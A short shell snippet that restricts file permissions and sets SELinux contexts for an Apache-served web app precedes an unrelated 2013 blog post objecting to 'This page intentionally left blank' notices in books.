# don't allow others to do anything and allow my group to read and write all, don't allow apache to write anything
chmod -R u-w,o-rwxs,g+rw .
# set the umask so that others cannot do anything with newly created files
umask o-rwx
# set selinux context so that apache can access everything
chcon -t httpd_sys_content_t -R .
# set selinux context and permissions so that apache can write into places it needs to be able to write
chcon -t httpd_sys_rw_content_t -R config cache log img mails modules translations upload download sitemap.xml
chmod -R u+rw config cache log img mails modules translations upload download sitemap.xml

Wednesday, March 27, 2013

This page was not left blank after all

Like a break after a paragraph, a blank page is something you would expect after a chapter, after the table of contents and before appendices. Blank pages make it easier to read the content they separate.

For some reason the practice of adding disclaimers to blank pages has been gaining popularity. Some are even promoting it. What is the reason for this? Are people getting too stupid to figure out on their own that a blank page is there just to separate content? It is possible that I'm just suffering from the Baader-Meinhof phenomenon again, but I'm sure books used to contain a lot of blank pages without needing disclaimers on them.

I like to immerse myself when I'm reading and just consume the words as quickly as I am able to. Sometimes I find myself reading a line that has no relevance to the work I'm reading. There are a few variations, but it usually reads something like:


This page intentionally left blank


It's a lie. Actually, it's not even a sentence (it lacks a verb). The page ceases to be blank once it is written on. It's distracting. It's like a speaker who keeps talking without interruption instead of pausing to emphasize a point or to give some time for thinking. It's like replacing every possible pause with verbal fillers. It's unnecessary and confusing.

Okay, there might be situations where the author has not made it clear that the previous segment has ended, but then it's a matter of the author not doing a good enough job, or you're reading something like poetry. A disclaimer at that point won't help you very much in any case. Sometimes it's distracting enough for someone to stop reading and write a blog article about it instead. So do everyone a favor and don't put disclaimers on empty pages; maybe then someone else will be spared an article like this.

What's wrong with a simple page number?

Tip me if you like what you're reading